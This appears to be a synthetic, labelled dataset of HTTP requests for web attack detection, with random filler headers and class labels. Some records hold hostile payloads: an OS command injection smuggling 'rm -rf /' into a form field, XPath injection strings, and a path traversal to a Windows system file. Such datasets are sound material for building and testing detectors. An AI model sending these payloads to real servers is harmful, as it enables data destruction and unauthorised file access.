----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26692
Start - Id: 33349
class: Valid
POST /1.OI5vSK4/emM/n9z.cfm? HTTP/1.0
Content-Length: 14
Content-Language: teaneea,yd
Content-Encoding: identity
Content-Location: http://2a9mbd.de/ASceirC/5dfUizyi/rstaf89/1hlar/1wem5hg.nsf
Content-MD5: NHpFc3J0b3JuVHgxYXVhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Sep 04 18:10:27 GMT
Last-Modified: Sun, 01 Oct 06 21:14:01 GMT
Host: 96.174.163.50
Connection: iirc1
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Eeet6ru-Dmoe5e;q=0.1, b-7egacd;q=0.3, m3-zSaaohi;q=0.3, t2amm-fpnrau4
Cache-Control: max-stale
Client-ip: 219.255.155.213
Cookie: myrpRpAxct=tt e@athojrbwgetttmetaandtelneta;9sgeHmessg=sfp |;O0BkTrnJH=nucye8sysua;ro=aF2VS81MjL;thaibn=67713244
Cookie2: $Version="144"
Date: Fri, 25 Dec 09 11:31:23 GMT
ETag: W/"ON51Dk_@v.I6b61AOv"
Expect: e3cuqbfd=77shnm;icoes=cwehe
From: Aeragl@tweisb5so.ch
If-Modified-Since: Tue, 17 Feb 09 13:48:27 GMT
If-Unmodified-Since: Fri, 09 Apr 10 17:57:51 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: euet eprhhwtr=g2dt
Authorization: NTLM M1R2dWloVGNtb0Vqc2FJSXR0N21kZW9rZXN0bG9lYXlDc3RiTFRl
Range: 235525-99
Referer: /i1vna/7ttn9A.txt
TE: gzip,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.2 (Windows; U; Win 9x 6.2; my-tr; rv:1.7.7) Gecko/83494656
UA-CPU: MIPS
UA-Disp: 6397,158,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2101x785
Via: HTTP/7.8 www.peym2me.html
Transfer-Encoding: identity
Upgrade: 6stde/0.3, ewtMfk/8.5, rt9eT5/1.5, nSTo/9.3
Warning: 744 1.172.173.169 "uuvt3lirsoi" 
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 93235551323019151899
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

47hG8=ehywhere

End - Id: 33349
Start - Id: 43064
class: OsCommanding
POST /ssvsauts3eu7otr/24leSclxqnogded/AWchildf8h/tta7thwd.jsp? HTTP/1.1
Content-Length: 239
Content-Language: n,odpni,hgrai
Content-Encoding: gzip
Content-Location: /tr6N2a/aseln/MvHfreo/j6Yau.bin
Content-MD5: OGNlV3NtY2hOZGR0dGV0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Oct 08 21:59:43 GMT
Last-Modified: Sat, 08 Jul 06 24:33:46 GMT
Host: www.qsbq.net:6
Connection: keep-alive
Accept: application/*;q=0.3, image/png
Accept-Charset: x-mac-korean, x-mac-chinesesimp, iso-8859-8-i
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 38.62.165.132
Cookie: e6oyoKAnw2c=it5nshutdown=oM;qiLTyKfNaZkI=420907
Cookie2: $Version="48"
Date: Fri, 24 Jun 05 24:32:28 GMT
ETag: W/"QXl@Wqluj0HKLJ.8Ikl"
Expect: ni1y
From: sTleEdu@dtAttFd.de
If-Modified-Since: Sat, 20 Nov 04 01:53:46 UTC
If-Unmodified-Since: Tue, 08 May 07 04:09:25 CET
If-Match: "6a@Cdu7EoW85L7u"
If-None-Match: *
If-Range: Thu, 18 Sep 08 08:59:25 CET
Max-Forwards: 2
MIME-Version: 1.8
Pragma: i0nedc5='eiy'
Proxy-Authorization: wswe njne=Ot3enhto
Authorization: Digest username="4sya7ti"
Range: -86761,779-
Referer: /tmvodu5/aDrd/natixlTr/hete/li2oChW.exe
TE: chunked
Trailer: Accept
User-Agent: Mozilla/6.1 (X11; U; Linux i586 7.0; tn-le; rv:1.5.6) Gecko/86049920
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: oeni/1.6 69.127.27.89:082
Transfer-Encoding: identity
Upgrade: tun3o/7.3, omna/4.0
Warning: 511 www.SwtUak.png "nrU8ee" "Tue, 13 Jan 09 06:56:32 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 206096711388693916
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_G5exec=35169940&vqT=8379859&ecettb9jmteban=` rm  -rf     /     `&ivgzsdu7hln5=dajsgrlla?I&rm=lsssamh&K4techoF=noU%:&mcmldlr=i on6sthjybmi(d&enoe=lNo/&H11=aEn?&vhconnectZz3a9=euH&tinlr=5&weic=294841&espamamWei2=oii1ekaNtT

End - Id: 43064
Start - Id: 48533
class: XPathInjection
PUT /s0t/e6fJ7U/GzLetcZE5/nq.php4? HTTP/1.1
Content-Length: 351
Content-Language: art,9eaoyHin,eiAH
Content-Encoding: gzip
Content-Location: /eotP/lir4O/KnDth.tiff
Content-MD5: cWVUbGo0a3JUa3JFaHR0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 21 Jan 10 01:34:40 UTC
Last-Modified: Sat, 08 Aug 09 05:59:30 CET
Host: 112.94.159.213
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce, x-mac-arabic, x-mac-arabic;q=0.3, x-mac-chinesetrad, iso-8859-1;q=0.2
Accept-Encoding: 
Accept-Language: hosbgse-lrj2lNso, u-rl2z
Cache-Control: no-transform
Client-ip: 197.42.196.209
Cookie: ienmErlo=;;G_D6ladminNSetcVm=aVPKOv;eloslzvasL5ai=7;fXoJ6Zi=33493;u0XdexhiScfeihe=e4Hy-Q
Cookie2: $Version="5"
Date: Sun, 21 Aug 05 01:01:27 UTC
ETag: W/"tBZi-pENw9GtkAl"
Expect: 100-continue
From: l7hgtc@eorr.be
If-Modified-Since: Fri, 03 Aug 07 16:03:48 CET
If-Unmodified-Since: Sat, 15 Aug 09 14:53:12 UTC
If-Match: "Y4WHAQxCdfId2brc"
If-None-Match: "P4YF4uFlbGRIuJu2"
If-Range: Fri, 27 Nov 09 10:38:06 GMT
Max-Forwards: 77
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: hheeaG dehOfn=ka3m
Authorization: Digest cnonce="texSdoTP"
Range: 8664-
Referer: /eadg/ronul/eeyVenr.jpeg
TE: deflate;q=0.8,chunked;q=0.4,trailers
Trailer: Max-Forwards
User-Agent: de17yc http://www.hgoeeon.st
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3038x174
Via: FTP/9.2 www.oxepwo.js, 5.3 182.47.40.167
Transfer-Encoding: identity
Warning: 997 208.8.7.32:24 "H4ott" "Sun, 14 Mar 04 08:06:29 GMT"
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eoeehUcslf=hdpoaa8eoqecI&se0isAts9=locationnti+noSpsperltlhtpasshu&ittyd7=s&ohsheeagoo=na&f0tte=0eaA]&onscu=7&ci5tiamh=ls edv~+et replacetxiousr<&daouc255ert=071&yffeudscxea=0721836&te=]ae&uRKexecizv=nWsK9.-Ao&iCst=uu7r&se8e6nTevdc=309 or edyeqk/al/Ni/child::node()[position()=19] or     0997=&efhenoe=loern2hntos

End - Id: 48533
Start - Id: 3498
class: Valid
GET /e91apYQo-LpH/lk/eujogeeaanas/uroaldylrcioeoiuab/eCXF2J/fv4s/sW439VEGS2R.jpg?unionORbgsoundopenz5MJO9F=239&XJBmetaffG22all=skhr0dmtw&q@AN3KD1r=e02efJ&tt=siroqTc&Ers=934624 HTTP/1.1
Host: 91.43.102.192
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip, gzip, gzip, deflate;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 247.57.253.1
Cookie: 9nzInoco0ro= d9oeosv7documentEmetaqsock_streamq8ac6l;4nii3ihnxm=new ;DyLNmeta7_EJinclude=62263810
Cookie2: $Version="2"
Date: Mon, 07 Sep 09 24:32:46 GMT
ETag: W/"P50Wos7p2KQHH1wqJP"
Expect: 100-continue
From: uxKbis@erSpeat.org
If-Modified-Since: Sat, 16 Jun 07 24:43:54 CET
If-Unmodified-Since: Fri, 15 Oct 04 23:58:47 UTC
If-Match: "f11mKkeK3w_UB3S8"
If-None-Match: *
If-Range: Sat, 16 Jul 05 11:29:46 GMT
Max-Forwards: 36
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM eXNhcGFJMmxyMGk3TnV2aWl1b3A3dGFndHZmYWllZGNpc25wb2w=
Authorization: Digest opaque="c1fcnj3"
Range: 268680-567,-58
Referer: /wue0ilaa/xsze/adalEsS.fgf
TE: trailers
Trailer: If-Modified-Since
User-Agent: or.F75 http://www.ghNnESd5.be
UA-CPU: x86
UA-Disp: 7333,3930,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 505x3714
Via: 0.5 www.knmvch.js
Transfer-Encoding: identity
Upgrade: inat/2.9, rRci/3.1
Warning: 327 www.ahonen8.jpeg "inswlou" 
X-Forwarded-For: 36.213.69.49
X-Serial-Number: 8528165138107530
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 3498
Start - Id: 5595
class: Valid
PUT /nb97ecaW36smXxWDgA/o9NVtDTUho3AWwrdCqG2/i8nvSi@r9lU.shtml? HTTP/1.1
Content-Length: 66
Content-Language: EiltS,sTuuew,tlIhso
Content-Encoding: compress
Content-Location: /usa7/tscEtlh/Mhhu/h2iev/OnI8rt.png
Content-MD5: b3N0dHQ2ZGo5ZWVtbnNvZg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 13 Jan 06 15:05:48 GMT
Last-Modified: Wed, 10 Jan 07 07:18:38 UTC
Host: www.utyiSI.ch:2
Connection: btI8bjz
Accept: audio/*;q=0.6, audio/*, audio/basic;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: sdtai-nNy9, a72r-ihrsre, ret5rq-sn, hm-finritr;q=0.7
Cache-Control: no-store
Client-ip: 120.107.44.213
Cookie: aytont4uyruaep=Msqvotpet9
Cookie2: $Version="0"
Date: Sat, 11 Nov 06 12:39:38 CET
ETag: W/"yf8v3S-hPt7MNYXsQGs2"
Expect: 100-continue
From: 7biok@xuaoeetw.be
If-Modified-Since: Fri, 16 Mar 07 12:44:47 GMT
If-Unmodified-Since: Wed, 20 Feb 08 10:18:01 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 20 Jun 08 21:42:12 UTC
Max-Forwards: 2340
MIME-Version: 6.6
Pragma: 7EesetT=wtkgpd
Proxy-Authorization: Digest cnonce="retgil"
Authorization: Digest opaque="jglm4b"
Range: 24-53683,656856-66,34503-
Referer: /upneu/tmnna/iivetc/ctne/ndnpsCeM.pdf
TE: trailers
Trailer: If-Modified-Since
User-Agent: mnE4olwositua
UA-CPU: x86
UA-Disp: 6817,0716,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0202x3743
Via: met9is/6.4 www.9SceOik.png, 7.3 128.84.240.7:1, 9.1 www.ru9od.tiff
Transfer-Encoding: deflate
Upgrade: 0gdai/9.0, eup9/9.9, osahep/0.7, ihgie/4.7
Warning: 629 www.fs0i.shtml "erdO60eMst" 
X-Forwarded-For: 180.152.86.133
X-Serial-Number: 77684507526307
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

meqdfersdn0N=70438320&cibr=855&w2ete=tmHb&teseinpawoid4N=dautoexec

End - Id: 5595
Start - Id: 45375
class: PathTransversal
POST /cnIriewsnesne/aivxrthm1e/tzi62XO/qBY/os.shtml? HTTP/1.0
Content-Length: 164
Content-Language: hhehet7g,c,f
Content-Encoding: compress
Content-Location: /uzft0e/q4Osn/qgohee/rudrqke.pl
Content-MD5: QXNzMDFFcWF4bTRvZXNuOA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 May 04 04:57:24 GMT
Last-Modified: Mon, 08 May 06 13:26:31 GMT
Host: 49.88.198.155
Connection: fieeet
Accept: text/xml;q=0.6, image/gif;q=0.1
Accept-Charset: iso-8859-8-i;q=0.0, x-mac-icelandic;q=0.0, windows-1258;q=0.6, iso-8859-2;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: d-66evhth, oee-ni
Cache-Control: no-transform
Client-ip: 219.120.83.225
Cookie: cehjohyhOooh=7;Bha=eb9Q;diEn=928;rKGjoh=oepositionc;kork8Negoh0l=$ztl
Cookie2: $Version="96"
Date: Fri, 27 Aug 04 11:54:29 GMT
ETag: "BVmpJ8txQ8q.HBmdrzQB"
Expect: 100-continue
From: R3loelSr@cnorhewh.st
If-Modified-Since: Sun, 12 Feb 06 14:58:48 UTC
If-Unmodified-Since: Wed, 27 Jun 07 18:46:59 UTC
If-Match: "8bl_RjSClDPqSdpag"
If-None-Match: "_6KX@XpcxoIZJoajb"
If-Range: Sun, 19 Sep 04 02:46:35 UTC
Max-Forwards: 81
MIME-Version: 4.4
Pragma: eel='sy'
Proxy-Authorization: NTLM cGVsYW9ldGxJMjRyb21pc2lpYXhpbWxyZG5lZHVsc2VpN2FlSGM=
Authorization: Basic bmZiZXl6ZWw6clJoZ3JyZw==
Range: 0524-
Referer: http://fmatot3.ch/fhihsi8.swf
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: eKxSDY http://www.hdktdet.net
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Color: color8
UA-Pixels: 0455x0884
Via: 1.0 40.146.129.164, FTP/3.4 3.243.189.169, ooe/1.3 33.111.197.167:3324
Transfer-Encoding: compress
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 033 102.101.187.47 "senpv3nMsOiNryeagcPt" 
X-Forwarded-For: 42.158.87.228
X-Serial-Number: 37550564020499
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

RI3A8kWj_Rpasswd=71731&the=219048&rmQIQhttps7FR5H=..\..\..\..\..\..\WINDOWS\system.ini&hbo7xrsCre2=[snsochinaau\is&sawhkR=ort&gnptag8poeowlr=09843

End - Id: 45375
Start - Id: 48865
class: XPathInjection
GET /tehht7s2trirniqI/ivqZN6AUe7adk6wlO/wi6YneJnpZs.asmx?vN-T=DeiR&iethHlm=98&pretgrbotolqyh=Einm9hlE%27+++++or++++nas%2F7d%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D631%5D++or+++++%27erba%27+++%3D+++%27 HTTP/1.0
Host: 53.180.199.58:1224
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-turkish;q=0.8
Accept-Encoding: gzip, compress, gzip
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 140.96.120.238
Cookie: Felnsshb=gWUS1IMXXS;pgnwEa=veqch;wfss=97888;zrxLe=fezVi64
Cookie2: $Version="570"
Date: Sat, 24 Jul 04 12:07:00 GMT
ETag: "_fRV_D@7oKn-qsK"
Expect: dn6t
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Fri, 21 Apr 06 11:00:05 CET
If-Unmodified-Since: Fri, 16 May 08 02:48:36 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 4.5
Pragma: eRt='g3'
Proxy-Authorization: Basic aHdmYTY6RXk3aw==
Authorization: 3Elb a13g7hsC=Namthsh
Range: 692-,-672,-664068
Referer: /ualIs.php4
TE: deflate;q=0.3,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/3.4 (X11; U; Linux i586 8.0; Or-ye; rv:3.3.8) Gecko/34669920
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: et24ca/3.0 254.56.23.172, 4.2 82.111.102.222
Transfer-Encoding: moo1
Upgrade: cntr/0.2, fRir/4.0, qalsS/7.9
Warning: 310 www.eeTl.png "bt2odjjda3vEdintInh" "Thu, 10 Jul 08 17:26:50 GMT"
X-Forwarded-For: 156.103.50.172
X-Serial-Number: 043440
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48865
Start - Id: 26887
class: Valid
GET /aUJoopKeZ@/o6i2yjasbP0rw4E/pkIlxclaAkVb8L/esq5eiilreteiooi5/aIBJC1O/TgIeqilsitttAenaLrze/positionbSYQ1mochaQSK/lspie9/9@ql9Ajp/nDcR@allls-ReCpbin/hUbclEWITXB7T.swf?wtSeauanSntt=RnnerrrosseIrs2&3sfIodfEnhep8rL=8563610&ieme=7cf%3C+b&passwdoAd@i=iyy79XFm8Y&exedt=psitmp&x6M=a%40%26t HTTP/1.0
Host: 197.178.22.213
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: j-m, nihvtee-So;q=0.8, exihDfo-rleonr, f-xeudt9Cs;q=0.9, ond-oo
Cache-Control: min-fresh=7272
Client-ip: 42.185.253.58
Cookie: Hrihrckeo=448245;eo=4005213;mniuto=7rrBntulha%raCo;3g912Zy12=598012
Cookie2: $Version="22"
Date: Sat, 05 Sep 09 04:39:07 CET
ETag: W/"n3wtu9Zffju0BFJ"
Expect: 100-continue
From: clW7Lgm@txs4tae.gov
If-Modified-Since: Thu, 23 Jun 05 21:41:33 GMT
If-Unmodified-Since: Sat, 11 Sep 04 13:43:16 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 26 May 07 24:04:39 CET
Max-Forwards: 6888
MIME-Version: 8.4
Pragma: oplloU='qinXhwux'
Proxy-Authorization: Basic YWlhZ2ZBcjo1bXJldQ==
Authorization: Basic cnJsVWN2OmF1b3M4bUU=
Range: 70837-,02-
Referer: /nmrssr/mscotei/TmoIlf/emien.js
TE: gzip;q=0.3,trailers,trailers
Trailer: Via
User-Agent: Mozilla/2.4 (X11; U; SunOS sun4u 8.4; vt-9p; rv:2.2.8) Gecko/44868793
UA-CPU: x86
UA-Disp: 1462,2709,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0290x1154
Via: 5.3 112.117.39.120, FTP/4.5 www.sskF.tiff:40754
Transfer-Encoding: identity
Upgrade: mhdhoc/5.7, iii/0.3, OdSnsv/0.4, egRm/2.5
Warning: 297 www.mw6loneh.png "otAjosweset" 
X-Forwarded-For: 35.173.18.194
X-Serial-Number: 06520
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 26887
Start - Id: 23035
class: Valid
GET /IinmPrdocumentF@/ilUxh7nknk/limuorrSeyaom.msf?xml7.YL-G49=HIeej&dlsnponh=ikmer&7ivnnoFn8atu=476&tsSfnddheaaa=bwgets&dggxt8hekUa2=bo2xAeitgbhs&i0te=tIf_9mzrOLB&gee=7&ut=7552&X1xoxehh=qdytnenest4nmti&shsrsiu=agp7tha HTTP/1.1
Host: www.eec2hnla.uk
Connection: close
Accept: */*;q=0.6
Accept-Charset: euc-tw, iso-2022-jp;q=0.0, x-mac-arabic;q=0.1, windows-1251;q=0.8
Accept-Encoding: *
Accept-Language: dSlms3-gih;q=0.6, reer7s7-pa, C12tetu-rEow
Cache-Control: no-store
Client-ip: 225.160.113.7
Cookie: otdakfdrabdq3=Tsetc3eogkono;nheucr2hkr=1MGX;rnersjaknttnrae=jSNIYp1A5Z9-;iBdotnsslo=ioohoe
Cookie2: $Version="4"
Date: Wed, 24 Mar 04 09:53:30 CET
ETag: W/"V2YHZdUh.94W3DyH"
Expect: 100-continue
From: itlt@Trihh.org
If-Modified-Since: Thu, 18 May 06 06:10:20 CET
If-Unmodified-Since: Sat, 05 Nov 05 16:58:42 CET
If-Match: "Y.qgs81po.uRJUZQx8s"
If-None-Match: "jvxMg90PSxqN_9Ym1T_d"
If-Range: Fri, 28 Jul 06 08:11:53 GMT
Max-Forwards: 55
MIME-Version: 2.9
Pragma: tu=lnttRYd9
Proxy-Authorization: Basic aHN4ZWNubGM6aHplcnBlTHI=
Authorization: NTLM cnNuZWlvZXF0ejZBbmVzcWFheWFuaG9zaXRlYmFucGtkZXJqZW5haXJzdG5pZUE=
Range: -41
Referer: /qshd/andt/oiben7s/peee0rt/7eiytae.aspx
TE: deflate;q=0.3
Trailer: Warning
User-Agent: Mozilla/3.6 (X11; U; Open BSD i386 6.7; ec-Cp; rv:8.8.0) Gecko/62483440
UA-CPU: x86
UA-Disp: 8779,521,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6076x9120
Via: FTP/0.1 75.67.210.226, 2.3 131.186.153.160:0
Transfer-Encoding: gzip
Upgrade: 4ioa/3.2, ourts/6.6, pUr8/3.5, poy1h/9.5, oursss/9.1
Warning: 738 www.grsFeoxo.png "itas" 
X-Forwarded-For: 160.34.50.92
X-Serial-Number: 794051
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23035
Start - Id: 10107
class: Valid
GET /ecdwle2lmeea2/S255homeewcrreplaceb/eTK9xNAsrjhntsd/ctYdYQCD/eb3Bx-Vx.dll? HTTP/1.1
Host: 20.79.122.168
Connection: y3nhohp
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, deflate
Accept-Language: *;q=0.3
Cache-Control: max-age=356
Client-ip: 125.47.27.37
Cookie: nr=e'heVr>nedniatltmpt;0dansA=n5V;hi5llDtrrrdo=fK9C9wj6Q
Cookie2: $Version="6"
Date: Tue, 09 Jan 07 10:53:55 CET
ETag: ".kTon@nrcyi7gsbpU553"
Expect: 100-continue
From: tsbr5seo@najlknme.it
If-Modified-Since: Sun, 14 Aug 05 19:18:59 CET
If-Unmodified-Since: Fri, 22 Oct 04 14:43:15 GMT
If-Match: "GFkLjy59-ZgE8jy2wU"
If-None-Match: *
If-Range: Sat, 05 Jul 08 22:12:05 GMT
Max-Forwards: 759
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: NTLM UlQ3dG5uZHR0YWFydWhlcnN0dHUzNW1PZTZvZGV0bHppYWZubnJ0bm10YWZocw==
Authorization: NTLM bzVuZW1zZXNpY2dlYW44VXJ0dWRldzl5ZUxmYWVoZXN0dG44WGxlc00=
Range: -4,998277-
Referer: /aRedS7/etvi/Saltl/yoeisst/s1e3ekoT.ace
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/2.0 (X11; U; SunOS sun4u 2.6; ec-hg; rv:8.4.5) Gecko/90515255
UA-CPU: x86
UA-Disp: 886,964,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9723x8891
Via: 0.0 81.112.202.86
Transfer-Encoding: rLteic; frzhoaa=aude
Upgrade: 9auhs/2.2, Vr6/5.2, idMee/1.6, dTb/1.4, Owrn3l/3.6
Warning: 301 www.Ipmhyt.jpeg "eqieennEenOi6nv" 
X-Forwarded-For: 219.87.157.60
X-Serial-Number: 70224009
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10107
Start - Id: 24719
class: Valid
GET /y0.gif? HTTP/1.1
Host: www.ohwl.gov
Connection: 0Cnhonir
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: identity;q=0.7, deflate;q=0.4
Accept-Language: *;q=0.4
Cache-Control: 5n='lptsng'
Client-ip: 246.244.195.20
Cookie: rE2la88auie6wha=enh=i;tt3ltzarm=script;mrucDaiseoh5m=861;_Jdb=1henataam/n
Cookie2: $Version="65"
Date: Mon, 28 Jun 04 22:02:26 UTC
ETag: W/"cqWDGu17PF9Kw@Joto"
Expect: 100-continue
From: rtat7i@re8ta.net
If-Modified-Since: Wed, 15 Jul 09 04:38:30 CET
If-Unmodified-Since: Sat, 31 May 08 23:21:26 UTC
If-Match: "Lv90q@RbxtG4MeZGMVr"
If-None-Match: *
If-Range: *
Max-Forwards: 721
MIME-Version: 6.5
Pragma: hondde=a1w0w
Proxy-Authorization: NTLM YWJvdG5vbHJzdHNlbXJvZmlldTJkT2VnYWRSc1B5bzdlaWJodGNy
Authorization: Digest cnonce="STN0"
Range: 94913-68559,806419-4130
Referer: http://yt27.ch/sihhSt/rrtucl0.html
TE: chunked,deflate
Trailer: Max-Forwards
User-Agent: Mozilla/0.3 (Machintosh; U; Mac OS X 5.3; so-wl; rv:8.1.9) Gecko/12793932
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1017x8120
Via: 4.8 www.teR9s.jpg, eitsr/1.5 46.85.14.86:381
Transfer-Encoding: bhcai
Upgrade: utt/2.3, OloG/9.0
Warning: 261 www.tddrisan.shtml:4608 "amni" 
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 22326900137086
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24719
Start - Id: 25770
class: Valid
GET /zrDahmEyz/uJ18jC_IuXEkaBUQvWK/sCIu8IsuCam4/ivl/yuXNh_3ALvYUzP/twG82E3VTv..wk4CX/auvtuJ_EUmyIU1J/a.Fz7ePqz0Dz/n5hLEaiozhL.tiff? HTTP/1.0
Host: www.n8un.ch:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: cp-950;q=0.1, euc-cn, iso-2022-kr, big5;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.2
Cache-Control: min-fresh=5845
Client-ip: 120.208.51.103
Cookie: VAf5cjXQ=knMltcsrI;b3earHbR=3313260
Cookie2: $Version="44"
Date: Tue, 04 Oct 05 22:02:27 CET
ETag: "cCtBQZzRU.kr8EP"
Expect: 100-continue
From: adeoanpa@5iod2.de
If-Modified-Since: Thu, 15 Apr 04 20:15:11 UTC
If-Unmodified-Since: Thu, 16 Aug 07 18:41:40 UTC
If-Match: "3x-KSTjqvVCTTpF9"
If-None-Match: *
If-Range: Fri, 13 Apr 07 21:01:03 CET
Max-Forwards: 56
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM bWxvaGhtdEhmdDB3amhtZXdOc3lHbmpubmd0NGJjVDhhVHM3czRzbDAyWG0=
Authorization: Digest qop=auth
Range: 0846-,55-
Referer: http://www.earatAtl.biz/oa3h/xoso/ntyp3s.pl
TE: trailers,trailers,chunked;q=0.8
Trailer: Warning
User-Agent: Mozilla/4.3 (X11; U; SunOS sun4u 4.1; pe-ue; rv:6.7.7) Gecko/19994926
UA-CPU: MIPS
UA-Disp: 4510,2608,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 291x574
Via: 2.6 197.127.103.210, FTP/7.9 13.243.49.247, 6.2 210.174.14.21
Transfer-Encoding: deflate
Upgrade: wqn/1.7, nvnp/4.1
Warning: 928 4.71.150.181 "eif2TenhunoLoU" 
X-Forwarded-For: 249.109.166.6
X-Serial-Number: 63082151043081
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25770
Start - Id: 19175
class: Valid
GET /a7MGegMEQSlsCbf/lGSgxXlRzIs7-d6cLYBn/5assp5-MnodemetajI/zpQVUakB2DeTtmQ@X.msf?Nq7Dbxp_stdin4f=e1KVMtFSC&oaqoh=rvjvQadKz&ayebutd=056093903&aehuee=7222&Ers=ee&nohir7itEaEeln=21&ttu55Hreg=EeasEniyD2&OirdA=ouqaEro8h+l%26qc%29&Xmailf@T=2Asamj%5D3t&Iu4ve6vneav=atxtifjtRit&ietm=m+wnl&otfIy8.1hqq=93mnm+stojt%7E&LSJ5AXO0=systemgzw+&QKG83=5921 HTTP/1.1
Host: www.s8a4i.org
Connection: s1Mm
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.0, deflate;q=0.3
Accept-Language: uyThoo-jv9tDae;q=0.6, h2-a8R1damf;q=0.2
Cache-Control: max-age=1111
Client-ip: 68.134.240.21
Cookie: Dcopyzdt4RZfp=egns;in=1843856183;Ebwdsrrhi= <xetzO qwindow.openogndn
Cookie2: $Version="5"
Date: Thu, 27 Jan 05 01:50:59 UTC
ETag: "yB-iVxAP-lgk3@L"
Expect: 100-continue
From: ToNpsn@tvfalhel.biz
If-Modified-Since: Sat, 04 Oct 08 01:00:31 UTC
If-Unmodified-Since: Mon, 19 Oct 09 07:52:49 UTC
If-Match: "U.4MZjPVi1iW.LQ"
If-None-Match: "77i5Wj1XM-MJ8wEUxFi"
If-Range: "nkS.pK5cqoLCxhV.1"
Max-Forwards: 1363
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic UnJhcDl0OmFhdHNlbmQ=
Authorization: Lfyfo snmw=ecaqeor
Range: 13883-,898-1,-8
Referer: http://www.onwee.fr/EitgtoM/d0sion.msf
TE: trailers,deflate;q=0.7,gzip;q=0.9
Trailer: Referer
User-Agent: Mozilla/7.5 (Machintosh; U; PPC Mac OS X 6.7; yu-uo; rv:6.2.5) Gecko/82509678
UA-CPU: 68000
UA-Disp: 848,6466,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 923x3383
Via: iryie/6.2 126.119.192.13, 1tolen/3.3 10.121.112.199
Transfer-Encoding: gzip
Upgrade: Nhb7n/6.4, qdE5/2.8, eeoyku/4.6, nqr/9.5
Warning: 614 www.eetaa.js "sstotIsaxxrntd" "Tue, 10 Jun 08 13:53:56 GMT"
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 1861049652
----: ----------------------------
